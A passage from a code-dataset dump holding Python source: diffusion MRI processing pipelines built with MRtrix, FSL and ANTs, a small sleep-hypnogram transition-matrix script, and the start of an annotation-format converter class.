types. Used in ACT streamlines tractography\"),\n optional=True),\n InputFilesetSpec('anat_fs_recon_all', zip_format, optional=True,\n desc=(\"Co-registered freesurfer recon-all output. \"\n \"Used in building the connectome\")),\n InputFilesetSpec('reverse_phase', STD_IMAGE_FORMATS, optional=True),\n FilesetSpec('grad_dirs', fsl_bvecs_format, 'preprocess_pipeline'),\n FilesetSpec('grad_dirs_coreg', fsl_bvecs_format,\n 'series_coreg_pipeline',\n desc=(\"The gradient directions coregistered to the \"\n \"orientation of the coreg reference\")),\n FilesetSpec('bvalues', fsl_bvals_format, 'preprocess_pipeline',\n desc=(\"\")),\n FilesetSpec('eddy_par', eddy_par_format, 'preprocess_pipeline',\n desc=(\"\")),\n FilesetSpec('noise_residual', mrtrix_image_format,\n 'preprocess_pipeline',\n desc=(\"\")),\n FilesetSpec('tensor', nifti_gz_format, 'tensor_pipeline',\n desc=(\"\")),\n FilesetSpec('fa', nifti_gz_format, 'tensor_metrics_pipeline',\n desc=(\"\")),\n FilesetSpec('adc', nifti_gz_format, 'tensor_metrics_pipeline',\n desc=(\"\")),\n FilesetSpec('wm_response', text_format, 'response_pipeline',\n desc=(\"\")),\n FilesetSpec('gm_response', text_format, 'response_pipeline',\n desc=(\"\")),\n FilesetSpec('csf_response', text_format, 'response_pipeline',\n desc=(\"\")),\n FilesetSpec('avg_response', text_format, 'average_response_pipeline',\n desc=(\"\")),\n FilesetSpec('wm_odf', mrtrix_image_format, 'fod_pipeline',\n desc=(\"\")),\n FilesetSpec('gm_odf', mrtrix_image_format, 'fod_pipeline',\n desc=(\"\")),\n FilesetSpec('csf_odf', mrtrix_image_format, 'fod_pipeline',\n desc=(\"\")),\n FilesetSpec('norm_intensity', mrtrix_image_format,\n 'intensity_normalisation_pipeline',\n desc=(\"\")),\n FilesetSpec('norm_intens_fa_template', mrtrix_image_format,\n 'intensity_normalisation_pipeline', frequency='per_study',\n desc=(\"\")),\n FilesetSpec('norm_intens_wm_mask', mrtrix_image_format,\n 'intensity_normalisation_pipeline', frequency='per_study',\n desc=(\"\")),\n FilesetSpec('global_tracks', mrtrix_track_format,\n 'global_tracking_pipeline',\n desc=(\"\")),\n FilesetSpec('wm_mask', mrtrix_image_format,\n 'global_tracking_pipeline',\n desc=(\"\")),\n FilesetSpec('connectome', csv_format, 'connectome_pipeline',\n desc=(\"\"))]\n\n add_param_specs = [\n ParamSpec('multi_tissue', True,\n desc=(\"\")),\n ParamSpec('preproc_pe_dir', None, dtype=str,\n desc=(\"\")),\n ParamSpec('tbss_skel_thresh', 0.2,\n desc=(\"\")),\n ParamSpec('fsl_mask_f', 0.25,\n desc=(\"\")),\n ParamSpec('bet_robust', True,\n desc=(\"\")),\n ParamSpec('bet_f_threshold', 0.2,\n desc=(\"\")),\n ParamSpec('bet_reduce_bias', False,\n desc=(\"\")),\n ParamSpec('num_global_tracks', int(1e9),\n desc=(\"\")),\n ParamSpec('global_tracks_cutoff', 0.05,\n desc=(\"\")),\n SwitchSpec('preproc_denoise', False,\n desc=(\"\")),\n SwitchSpec('response_algorithm', 'tax',\n ('tax', 'dhollander', 'msmt_5tt'),\n desc=(\"\")),\n SwitchSpec('fod_algorithm', 'csd', ('csd', 'msmt_csd'),\n desc=(\"\")),\n MriStudy.param_spec('bet_method').with_new_choices('mrtrix'),\n SwitchSpec('reorient2std', False,\n desc=(\"\"))]\n\n primary_bids_input = BidsInputs(\n spec_name='series', type='dwi',\n valid_formats=(nifti_gz_x_format, nifti_gz_format))\n\n default_bids_inputs = [primary_bids_input,\n BidsAssocInputs(\n spec_name='bvalues',\n primary=primary_bids_input,\n association='grads',\n type='bval',\n format=fsl_bvals_format),\n BidsAssocInputs(\n spec_name='grad_dirs',\n primary=primary_bids_input,\n association='grads',\n type='bvec',\n format=fsl_bvecs_format),\n BidsAssocInputs(\n spec_name='reverse_phase',\n primary=primary_bids_input,\n association='epi',\n format=nifti_gz_format,\n drop_if_missing=True)]\n\n RECOMMENDED_NUM_SESSIONS_FOR_INTENS_NORM = 5\n\n primary_scan_name = 'series'\n\n @property\n def multi_tissue(self):\n return self.branch('response_algorithm',\n ('msmt_5tt', 'dhollander'))\n\n def fsl_grads(self, pipeline, coregistered=True):\n \"Adds and returns a node to the pipeline to merge the FSL grads and \"\n \"bvecs\"\n try:\n fslgrad = pipeline.node('fslgrad')\n except ArcanaNameError:\n if self.is_coregistered and coregistered:\n grad_dirs = 'grad_dirs_coreg'\n else:\n grad_dirs = 'grad_dirs'\n # Gradient merge node\n fslgrad = pipeline.add(\n \"fslgrad\",\n MergeTuple(2),\n inputs={\n 'in1': (grad_dirs, fsl_bvecs_format),\n 'in2': ('bvalues', fsl_bvals_format)})\n return (fslgrad, 'out')\n\n def extract_magnitude_pipeline(self, **name_maps):\n\n pipeline = self.new_pipeline(\n 'extract_magnitude',\n desc=\"Extracts the first b==0 volume from the series\",\n citations=[],\n name_maps=name_maps)\n\n dwiextract = pipeline.add(\n 'dwiextract',\n ExtractDWIorB0(\n bzero=True,\n out_ext='.nii.gz'),\n inputs={\n 'in_file': ('series', nifti_gz_format),\n 'fslgrad': self.fsl_grads(pipeline, coregistered=False)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n pipeline.add(\n \"extract_first_vol\",\n MRConvert(\n coord=(3, 0)),\n inputs={\n 'in_file': (dwiextract, 'out_file')},\n outputs={\n 'magnitude': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n def preprocess_pipeline(self, **name_maps):\n \"\"\"\n Performs a series of FSL preprocessing steps, including Eddy and Topup\n\n Parameters\n ----------\n phase_dir : str{AP|LR|IS}\n The phase encode direction\n \"\"\"\n\n # Determine whether we can correct for distortion, i.e. if reference\n # scans are provided\n # Include all references\n references = [fsl_cite, eddy_cite, topup_cite,\n distort_correct_cite, n4_cite]\n if self.branch('preproc_denoise'):\n references.extend(dwidenoise_cites)\n\n pipeline = self.new_pipeline(\n name='preprocess',\n name_maps=name_maps,\n desc=(\n \"Preprocess dMRI studies using distortion correction\"),\n citations=references)\n\n # Create nodes to gradients to FSL format\n if self.input('series').format == dicom_format:\n extract_grad = pipeline.add(\n \"extract_grad\",\n ExtractFSLGradients(),\n inputs={\n 'in_file': ('series', dicom_format)},\n outputs={\n 'grad_dirs': ('bvecs_file', fsl_bvecs_format),\n 'bvalues': ('bvals_file', fsl_bvals_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n grad_fsl_inputs = {'in1': (extract_grad, 'bvecs_file'),\n 'in2': (extract_grad, 'bvals_file')}\n elif self.provided('grad_dirs') and self.provided('bvalues'):\n grad_fsl_inputs = {'in1': ('grad_dirs', fsl_bvecs_format),\n 'in2': ('bvalues', fsl_bvals_format)}\n else:\n raise BananaUsageError(\n \"Either input 'magnitude' image needs to be in DICOM format \"\n \"or gradient directions and b-values need to be explicitly \"\n \"provided to {}\".format(self))\n\n # Gradient merge node\n grad_fsl = pipeline.add(\n \"grad_fsl\",\n MergeTuple(2),\n inputs=grad_fsl_inputs)\n\n gradients = (grad_fsl, 'out')\n\n # Create node to reorient preproc out_file\n if self.branch('reorient2std'):\n reorient = pipeline.add(\n 'fslreorient2std',\n fsl.utils.Reorient2Std(\n output_type='NIFTI_GZ'),\n inputs={\n 'in_file': ('series', nifti_gz_format)},\n requirements=[fsl_req.v('5.0.9')])\n reoriented = (reorient, 'out_file')\n else:\n reoriented = ('series', nifti_gz_format)\n\n # Denoise the dwi-scan\n if self.branch('preproc_denoise'):\n # Run denoising\n denoise = pipeline.add(\n 'denoise',\n DWIDenoise(),\n inputs={\n 'in_file': reoriented},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Calculate residual noise\n subtract_operands = pipeline.add(\n 'subtract_operands',\n Merge(2),\n inputs={\n 'in1': reoriented,\n 'in2': (denoise, 'noise')})\n\n pipeline.add(\n 'subtract',\n MRCalc(\n operation='subtract'),\n inputs={\n 'operands': (subtract_operands, 'out')},\n outputs={\n 'noise_residual': ('out_file', mrtrix_image_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n denoised = (denoise, 'out_file')\n else:\n denoised = reoriented\n\n # Preproc kwargs\n preproc_kwargs = {}\n preproc_inputs = {'in_file': denoised,\n 'grad_fsl': gradients}\n\n if self.provided('reverse_phase'):\n\n if self.provided('magnitude', default_okay=False):\n dwi_reference = ('magnitude', mrtrix_image_format)\n else:\n # Extract b=0 volumes\n dwiextract = pipeline.add(\n 'dwiextract',\n ExtractDWIorB0(\n bzero=True,\n out_ext='.nii.gz'),\n inputs={\n 'in_file': denoised,\n 'fslgrad': gradients},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Get first b=0 from dwi b=0 volumes\n extract_first_b0 = pipeline.add(\n \"extract_first_vol\",\n MRConvert(\n coord=(3, 0)),\n inputs={\n 'in_file': (dwiextract, 'out_file')},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n dwi_reference = (extract_first_b0, 'out_file')\n\n # Concatenate extracted forward rpe with reverse rpe\n combined_images = pipeline.add(\n 'combined_images',\n MRCat(),\n inputs={\n 'first_scan': dwi_reference,\n 'second_scan': ('reverse_phase', mrtrix_image_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Create node to assign the right PED to the diffusion\n prep_dwi = pipeline.add(\n 'prepare_dwi',\n PrepareDWI(),\n inputs={\n 'pe_dir': ('ped', float),\n 'ped_polarity': ('pe_angle', float)})\n\n preproc_kwargs['rpe_pair'] = True\n\n distortion_correction = True\n preproc_inputs['se_epi'] = (combined_images, 'out_file')\n else:\n distortion_correction = False\n preproc_kwargs['rpe_none'] = True\n\n if self.parameter('preproc_pe_dir') is not None:\n preproc_kwargs['pe_dir'] = self.parameter('preproc_pe_dir')\n\n preproc = pipeline.add(\n 'dwipreproc',\n DWIPreproc(\n no_clean_up=True,\n out_file_ext='.nii.gz',\n # FIXME: Need to determine this programmatically\n # eddy_parameters = '--data_is_shelled '\n temp_dir='dwipreproc_tempdir',\n **preproc_kwargs),\n inputs=preproc_inputs,\n outputs={\n 'eddy_par': ('eddy_parameters', eddy_par_format)},\n requirements=[mrtrix_req.v('3.0rc3'), fsl_req.v('5.0.10')],\n wall_time=60)\n\n if distortion_correction:\n pipeline.connect(prep_dwi, 'pe', preproc, 'pe_dir')\n\n mask = pipeline.add(\n 'dwi2mask',\n BrainMask(\n out_file='brainmask.nii.gz'),\n inputs={\n 'in_file': (preproc, 'out_file'),\n 'grad_fsl': gradients},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Create bias correct node\n pipeline.add(\n \"bias_correct\",\n DWIBiasCorrect(\n method='ants'),\n inputs={\n 'grad_fsl': gradients, # internal\n 'in_file': (preproc, 'out_file'),\n 'mask': (mask, 'out_file')},\n outputs={\n 'series_preproc': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3'), ants_req.v('2.0')])\n\n return pipeline\n\n def brain_extraction_pipeline(self, **name_maps):\n \"\"\"\n Generates a whole brain mask using MRtrix's 'dwi2mask' command\n\n Parameters\n ----------\n mask_tool: Str\n Can be either 'bet' or 'dwi2mask' depending on which mask tool you\n want to use\n \"\"\"\n\n if self.branch('bet_method', 'mrtrix'):\n pipeline = self.new_pipeline(\n 'brain_extraction',\n desc=\"Generate brain mask from b0 images\",\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n if self.provided('coreg_ref'):\n series = 'series_coreg'\n else:\n series = 'series_preproc'\n\n # Create mask node\n masker = pipeline.add(\n 'dwi2mask',\n BrainMask(\n out_file='brain_mask.nii.gz'),\n inputs={\n 'in_file': (series, nifti_gz_format),\n 'grad_fsl': self.fsl_grads(pipeline, coregistered=False)},\n outputs={\n 'brain_mask': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n merge = pipeline.add(\n 'merge_operands',\n Merge(2),\n inputs={\n 'in1': ('mag_preproc', nifti_gz_format),\n 'in2': (masker, 'out_file')})\n\n pipeline.add(\n 'apply_mask',\n MRCalc(\n operation='multiply'),\n inputs={\n 'operands': (merge, 'out')},\n outputs={\n 'brain': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n else:\n pipeline = super().brain_extraction_pipeline(**name_maps)\n return pipeline\n\n def series_coreg_pipeline(self, **name_maps):\n\n pipeline = super().series_coreg_pipeline(**name_maps)\n\n # Apply coregistration transform to gradients\n pipeline.add(\n 'transform_grads',\n TransformGradients(),\n inputs={\n 'gradients': ('grad_dirs', fsl_bvecs_format),\n 'transform': ('coreg_fsl_mat', text_matrix_format)},\n outputs={\n 'grad_dirs_coreg': ('transformed', fsl_bvecs_format)})\n\n return pipeline\n\n def intensity_normalisation_pipeline(self, **name_maps):\n\n if self.num_sessions < 2:\n raise ArcanaMissingDataException(\n \"Cannot normalise intensities of DWI images as study only \"\n \"contains a single session\")\n elif self.num_sessions < self.RECOMMENDED_NUM_SESSIONS_FOR_INTENS_NORM:\n logger.warning(\n \"The number of sessions in the study ({}) is less than the \"\n \"recommended number for intensity normalisation ({}). The \"\n \"results may be unreliable\".format(\n self.num_sessions,\n self.RECOMMENDED_NUM_SESSIONS_FOR_INTENS_NORM))\n\n pipeline = self.new_pipeline(\n name='intensity_normalization',\n desc=\"Corrects for B1 field inhomogeneity\",\n citations=[mrtrix_req.v('3.0rc3')],\n name_maps=name_maps)\n\n mrconvert = pipeline.add(\n 'mrconvert',\n MRConvert(\n out_ext='.mif'),\n inputs={\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format),\n 'grad_fsl': self.fsl_grads(pipeline)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Pair subject and visit ids together, expanding so they can be\n # joined and chained together\n session_ids = pipeline.add(\n 'session_ids',\n utility.IdentityInterface(\n ['subject_id', 'visit_id']),\n inputs={\n 'subject_id': (Study.SUBJECT_ID, int),\n 'visit_id': (Study.VISIT_ID, int)})\n\n # Set up join nodes\n join_fields = ['dwis', 'masks', 'subject_ids', 'visit_ids']\n join_over_subjects = pipeline.add(\n 'join_over_subjects',\n utility.IdentityInterface(\n join_fields),\n inputs={\n 'masks': (self.brain_mask_spec_name, nifti_gz_format),\n 'dwis': (mrconvert, 'out_file'),\n 'subject_ids': (session_ids, 'subject_id'),\n 'visit_ids': (session_ids, 'visit_id')},\n joinsource=self.SUBJECT_ID,\n joinfield=join_fields)\n\n join_over_visits = pipeline.add(\n 'join_over_visits',\n Chain(\n join_fields),\n inputs={\n 'dwis': (join_over_subjects, 'dwis'),\n 'masks': (join_over_subjects, 'masks'),\n 'subject_ids': (join_over_subjects, 'subject_ids'),\n 'visit_ids': (join_over_subjects, 'visit_ids')},\n joinsource=self.VISIT_ID,\n joinfield=join_fields)\n\n # Intensity normalization\n intensity_norm = pipeline.add(\n 'dwiintensitynorm',\n DWIIntensityNorm(),\n inputs={\n 'in_files': (join_over_visits, 'dwis'),\n 'masks': (join_over_visits, 'masks')},\n outputs={\n 'norm_intens_fa_template': ('fa_template',\n mrtrix_image_format),\n 'norm_intens_wm_mask': ('wm_mask', mrtrix_image_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Set up expand nodes\n pipeline.add(\n 'expand', SelectSession(),\n inputs={\n 'subject_ids': (join_over_visits, 'subject_ids'),\n 'visit_ids': (join_over_visits, 'visit_ids'),\n 'inlist': (intensity_norm, 'out_files'),\n 'subject_id': (Study.SUBJECT_ID, int),\n 'visit_id': (Study.VISIT_ID, int)},\n outputs={\n 'norm_intensity': ('item', mrtrix_image_format)})\n\n # Connect inputs\n return pipeline\n\n def tensor_pipeline(self, **name_maps):\n \"\"\"\n Fits the apparrent diffusion tensor (DT) to each voxel of the image\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='tensor',\n desc=(\"Estimates the apparent diffusion tensor in each \"\n \"voxel\"),\n citations=[],\n name_maps=name_maps)\n\n # Create tensor fit node\n pipeline.add(\n 'dwi2tensor',\n FitTensor(\n out_file='dti.nii.gz'),\n inputs={\n 'grad_fsl': self.fsl_grads(pipeline),\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format),\n 'in_mask': (self.brain_mask_spec_name, nifti_gz_format)},\n outputs={\n 'tensor': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n def tensor_metrics_pipeline(self, **name_maps):\n \"\"\"\n Fits the apparrent diffusion tensor (DT) to each voxel of the image\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='fa',\n desc=(\"Calculates the FA and ADC from a tensor image\"),\n citations=[],\n name_maps=name_maps)\n\n # Create tensor fit node\n pipeline.add(\n 'metrics',\n TensorMetrics(\n out_fa='fa.nii.gz',\n out_adc='adc.nii.gz'),\n inputs={\n 'in_file': ('tensor', nifti_gz_format),\n 'in_mask': (self.brain_mask_spec_name, nifti_gz_format)},\n outputs={\n 'fa': ('out_fa', nifti_gz_format),\n 'adc': ('out_adc', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n def response_pipeline(self, **name_maps):\n \"\"\"\n Estimates the fibre orientation distribution (FOD) using constrained\n spherical deconvolution\n\n Parameters\n ----------\n response_algorithm : str\n Algorithm used to estimate the response\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='response',\n desc=(\"Estimates the fibre response function\"),\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n # Create fod fit node\n response = pipeline.add(\n 'response',\n ResponseSD(\n algorithm=self.parameter('response_algorithm')),\n inputs={\n 'grad_fsl': self.fsl_grads(pipeline),\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format),\n 'in_mask': (self.brain_mask_spec_name, nifti_gz_format)},\n outputs={\n 'wm_response': ('wm_file', text_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Connect to outputs\n if self.multi_tissue:\n response.inputs.gm_file = 'gm.txt',\n response.inputs.csf_file = 'csf.txt',\n pipeline.connect_output('gm_response', response, 'gm_file',\n text_format)\n pipeline.connect_output('csf_response', response, 'csf_file',\n text_format)\n\n return pipeline\n\n def average_response_pipeline(self, **name_maps):\n \"\"\"\n Averages the estimate response function over all subjects in the\n project\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='average_response',\n desc=(\n \"Averages the fibre response function over the project\"),\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n join_subjects = pipeline.add(\n 'join_subjects',\n utility.IdentityInterface(['responses']),\n inputs={\n 'responses': ('wm_response', text_format)},\n outputs={},\n joinsource=self.SUBJECT_ID,\n joinfield=['responses'])\n\n join_visits = pipeline.add(\n 'join_visits',\n Chain(['responses']),\n inputs={\n 'responses': (join_subjects, 'responses')},\n joinsource=self.VISIT_ID,\n joinfield=['responses'])\n\n pipeline.add(\n 'avg_response',\n AverageResponse(),\n inputs={\n 'in_files': (join_visits, 'responses')},\n outputs={\n 'avg_response': ('out_file', text_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n def fod_pipeline(self, **name_maps):\n \"\"\"\n Estimates the fibre orientation distribution (FOD) using constrained\n spherical deconvolution\n\n Parameters\n ----------\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='fod',\n desc=(\"Estimates the fibre orientation distribution in each\"\n \" voxel\"),\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n # Create fod fit node\n dwi2fod = pipeline.add(\n 'dwi2fod',\n EstimateFOD(\n algorithm=self.parameter('fod_algorithm')),\n inputs={\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format),\n 'wm_txt': ('wm_response', text_format),\n 'mask_file': (self.brain_mask_spec_name, nifti_gz_format),\n 'grad_fsl': self.fsl_grads(pipeline)},\n outputs={\n 'wm_odf': ('wm_odf', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n if self.multi_tissue:\n dwi2fod.inputs.gm_odf = 'gm.mif',\n dwi2fod.inputs.csf_odf = 'csf.mif',\n pipeline.connect_input('gm_response', dwi2fod, 'gm_txt',\n text_format),\n pipeline.connect_input('csf_response', dwi2fod, 'csf_txt',\n text_format),\n pipeline.connect_output('gm_odf', dwi2fod, 'gm_odf',\n nifti_gz_format),\n pipeline.connect_output('csf_odf', dwi2fod, 'csf_odf',\n nifti_gz_format),\n # Check inputs/output are connected\n return pipeline\n\n def extract_b0_pipeline(self, **name_maps):\n \"\"\"\n Extracts the b0 images from a DWI study and takes their mean\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='extract_b0',\n desc=\"Extract b0 image from a DWI study\",\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n # Extraction node\n extract_b0s = pipeline.add(\n 'extract_b0s',\n ExtractDWIorB0(\n bzero=True,\n quiet=True),\n inputs={\n 'fslgrad': self.fsl_grads(pipeline),\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # FIXME: Need a registration step before the mean\n # Mean calculation node\n mean = pipeline.add(\n \"mean\",\n MRMath(\n axis=3,\n operation='mean',\n quiet=True),\n inputs={\n 'in_files': (extract_b0s, 'out_file')},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n # Convert to Nifti\n pipeline.add(\n \"output_conversion\",\n MRConvert(\n out_ext='.nii.gz',\n quiet=True),\n inputs={\n 'in_file': (mean, 'out_file')},\n outputs={\n 'b0': ('out_file', nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n def global_tracking_pipeline(self, **name_maps):\n\n pipeline = self.new_pipeline(\n name='global_tracking',\n desc=\"Extract b0 image from a DWI study\",\n citations=[mrtrix_cite],\n name_maps=name_maps)\n\n mask = pipeline.add(\n 'mask',\n DWI2Mask(),\n inputs={\n 'grad_fsl': self.fsl_grads(pipeline),\n 'in_file': (self.series_preproc_spec_name, nifti_gz_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n tracking = pipeline.add(\n 'tracking',\n Tractography(\n select=self.parameter('num_global_tracks'),\n cutoff=self.parameter('global_tracks_cutoff')),\n inputs={\n 'seed_image': (mask, 'out_file'),\n 'in_file': ('wm_odf', mrtrix_image_format)},\n outputs={\n 'global_tracks': ('out_file', mrtrix_track_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n if self.provided('anat_5tt'):\n pipeline.connect_input('anat_5tt', tracking, 'act_file',\n mrtrix_image_format)\n\n return pipeline\n\n def intrascan_alignment_pipeline(self, **name_maps):\n\n pipeline = self.new_pipeline(\n name='affine_mat_generation',\n desc=(\"Generation of the affine matrices for the main dwi \"\n \"sequence starting from eddy motion parameters\"),\n citations=[fsl_cite],\n name_maps=name_maps)\n\n pipeline.add(\n 'gen_aff_mats',\n AffineMatrixGeneration(),\n inputs={\n 'reference_image': ('mag_preproc', nifti_gz_format),\n 'motion_parameters': ('eddy_par', eddy_par_format)},\n outputs={\n 'align_mats': ('affine_matrices', motion_mats_format)})\n\n return pipeline\n\n def connectome_pipeline(self, **name_maps):\n\n pipeline = self.new_pipeline(\n name='connectome',\n desc=(\"Generate a connectome from whole brain connectivity\"),\n citations=[],\n name_maps=name_maps)\n\n aseg_path = pipeline.add(\n 'aseg_path',\n AppendPath(\n sub_paths=['mri', 'aparc+aseg.mgz']),\n inputs={\n 'base_path': ('anat_fs_recon_all', directory_format)})\n\n pipeline.add(\n 'connectome',\n mrtrix3.BuildConnectome(),\n inputs={\n 'in_file': ('global_tracks', mrtrix_track_format),\n 'in_parc': (aseg_path, 'out_path')},\n outputs={\n 'connectome': ('out_file', csv_format)},\n requirements=[mrtrix_req.v('3.0rc3')])\n\n return pipeline\n\n\nclass DwiRefStudy(EpiStudy, metaclass=StudyMetaClass):\n\n add_data_specs = [\n InputFilesetSpec('reverse_phase', STD_IMAGE_FORMATS, optional=True)\n ]\n\n desc = (\"A special study used in the MR-PET motion correction algorithm to\"\n \" perform distortion correction on the reverse-phase/reference b0 \"\n \"scans by flipping it around and using the DWI series as the \"\n \"reference\")\n\n def preprocess_pipeline(self, **name_maps):\n\n if self.provided('reverse_phase'):\n return self._topup_pipeline(**name_maps)\n else:\n return super().preprocess_pipeline(**name_maps)\n\n def _topup_pipeline(self, **name_maps):\n \"\"\"\n Implementation of separate topup pipeline, moved from EPI study as it\n is only really relevant for spin-echo DWI. Need to work out what to do\n with it\n \"\"\"\n\n pipeline = self.new_pipeline(\n name='preprocess_pipeline',\n desc=(\"Topup distortion correction pipeline\"),\n citations=[fsl_cite],\n name_maps=name_maps)\n\n reorient_epi_in = pipeline.add(\n 'reorient_epi_in',\n fsl.utils.Reorient2Std(),\n inputs={\n 'in_file': ('magnitude', nifti_gz_format)},\n requirements=[fsl_req.v('5.0.9')])\n\n reorient_epi_opposite = pipeline.add(\n 'reorient_epi_opposite',\n fsl.utils.Reorient2Std(),\n inputs={\n 'in_file': ('reverse_phase', nifti_gz_format)},\n requirements=[fsl_req.v('5.0.9')])\n\n prep_dwi = pipeline.add(\n 'prepare_dwi',\n PrepareDWI(\n topup=True),\n inputs={\n 'pe_dir': ('ped', str),\n 'ped_polarity': ('pe_angle', str),\n 'dwi': (reorient_epi_in, 'out_file'),\n 'dwi1': (reorient_epi_opposite, 'out_file')})\n\n ped = pipeline.add(\n 'gen_config',\n GenTopupConfigFiles(),\n inputs={\n 'ped': (prep_dwi, 'pe')})\n\n merge_outputs = pipeline.add(\n 'merge_files',\n merge_lists(2),\n inputs={\n 'in1': (prep_dwi, 'main'),\n 'in2': (prep_dwi, 'secondary')})\n\n merge = pipeline.add(\n 'FslMerge',\n FslMerge(\n dimension='t',\n output_type='NIFTI_GZ'),\n inputs={\n 'in_files': (merge_outputs, 'out')},\n requirements=[fsl_req.v('5.0.9')])\n\n topup = pipeline.add(\n 'topup',\n TOPUP(\n output_type='NIFTI_GZ'),\n inputs={\n 'in_file': (merge, 'merged_file'),\n 'encoding_file': (ped, 'config_file')},\n requirements=[fsl_req.v('5.0.9')])\n\n in_apply_tp = pipeline.add(\n 'in_apply_tp',\n merge_lists(1),\n inputs={\n 'in1': (reorient_epi_in, 'out_file')})\n\n pipeline.add(\n 'applytopup',\n ApplyTOPUP(\n method='jac',\n in_index=[1],\n output_type='NIFTI_GZ'),\n inputs={\n 'in_files': (in_apply_tp, 'out'),\n 'encoding_file': (ped, 'apply_topup_config'),\n 'in_topup_movpar': (topup, 'out_movpar'),\n 'in_topup_fieldcoef': (topup, 'out_fieldcoef')},\n outputs={\n 'mag_preproc': ('out_corrected', nifti_gz_format)},\n requirements=[fsl_req.v('5.0.9')])\n\n return pipeline\n","sub_path":"banana/study/mri/dwi.py","file_name":"dwi.py","file_ext":"py","file_size_in_byte":37361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"569412882","text":"import json\nimport numpy as np\n\ndef create_transition_matrix():\n transition_matrix = np.ones((5,5))\n a = json.loads(open(\"data.json\", 'r').read())\n all_data = a['sleep']\n \n counter, average_length = 0, 0;\n for day in all_data:\n if 'hypnogram_5min' in day:\n average_length += len(day['hypnogram_5min'])\n counter +=1\n\n prob_matrix = np.ones((average_length//counter, 5))\n\n for day in all_data:\n if 'hypnogram_5min' in day:\n for timestep in range(len(day['hypnogram_5min'])-1):\n i, j = day['hypnogram_5min'][timestep], day['hypnogram_5min'][timestep+1]\n transition_matrix[i, j] += 1\n if timestep < average_length//counter:\n if i == 1:\n prob_matrix[timestep, i] += 4\n prob_matrix[timestep, i] += 1\n return transition_matrix, prob_matrix\n","sub_path":"make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"38121845","text":"'''\n\nThis object will receive the strategy from outside and will convert according to\n said strategy.\n\n'''\n\nimport glob\nimport os\nimport json\nimport shutil\nimport time\n\nfrom tqdm import tqdm\n\nfrom .coco_converters.coco_strategies import CocoObjectDetectionStrategy, CocoKeypointDetectionStrategy, CocoPanopticConverterStrategy\nfrom .voc_converters.voc_strategies import VocObjectDetectionStrategy\nfrom .labelbox_converters.labelbox_strategies import LabelBoxObjectDetectionStrategy\nfrom .dataloop_converters.dataloop_strategies import DataLoopObjectDetectionStrategy\nfrom .supervisely_converters.supervisely_strategies import SuperviselyObjectDetectionStrategy\nfrom .vott_converters.vott_strategies import VoTTObjectDetectionStrategy\nfrom .sagemaker_converters.sagemaker_strategies import SageMakerObjectDetectionStrategy\nfrom .vgg_converters.vgg_strategies import VGGObjectDetectionStrategy\nfrom .googlecloud_converters.googlecloud_strategies import GoogleCloudObjectDetectionStrategy\nfrom .yolo_converters.yolo_strategies import YoloObjectDetectionStrategy\n\n\nclass Converter(object):\n def __init__(self, args):\n self.output_dir = args.output_dir\n self._select_strategy(args)\n\n def convert_from_sa(self):\n self.strategy.sa_to_output_format()\n\n def convert_to_sa(self, platform):\n self.strategy.to_sa_format()\n\n def __set_strategy(self, c_strategy):\n self.strategy = c_strategy\n\n def _select_strategy(self, args):\n if args.dataset_format == \"COCO\":\n if args.task == 'instance_segmentation' or args.task == 'object_detection':\n c_strategy = CocoObjectDetectionStrategy(args)\n if args.task == 'keypoint_detection':\n c_strategy = CocoKeypointDetectionStrategy(args)\n if args.task == 'panoptic_segmentation':\n c_strategy = CocoPanopticConverterStrategy(args)\n elif args.dataset_format == \"VOC\":\n if args.task == 'instance_segmentation' or args.task == 'object_detection':\n c_strategy = VocObjectDetectionStrategy(args)\n elif args.dataset_format == \"LabelBox\":\n if args.task == \"object_detection\" or args.task == 'instance_segmentation' or args.task == 'vector_annotation':\n c_strategy = LabelBoxObjectDetectionStrategy(args)\n elif args.dataset_format == \"DataLoop\":\n if args.task == 'object_detection' or args.task == 'instance_segmentation' or 